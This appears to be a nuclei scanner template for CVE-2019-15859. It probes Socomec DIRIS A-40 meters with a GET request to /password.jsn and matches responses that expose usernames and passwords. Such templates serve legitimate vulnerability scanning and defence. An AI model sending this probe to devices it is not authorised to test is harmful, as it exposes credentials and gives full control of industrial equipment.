nuclei-templates/cves/2019/CVE-2019-15859.yaml

42 lines
1.2 KiB
YAML

id: CVE-2019-15859
info:
name: Socomec DIRIS A-40 Devices Password Disclosure
author: geeknik
severity: critical
description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.
reference:
- https://seclists.org/fulldisclosure/2019/Oct/10
- https://nvd.nist.gov/vuln/detail/CVE-2019-15859
- http://packetstormsecurity.com/files/154764/Socomec-DIRIS-A-40-Password-Disclosure.html
- https://www.socomec.com/single-circuit-multifunction-meters_en.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-15859
cwe-id: CWE-200
tags: seclists,packetstorm,cve,cve2019,disclosure,socomec,diris,iot
requests:
- method: GET
path:
- "{{BaseURL}}/password.jsn"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "text/json"
part: header
- type: word
words:
- "username"
- "password"
part: body
condition: and
# Enhanced by mp on 2022/03/29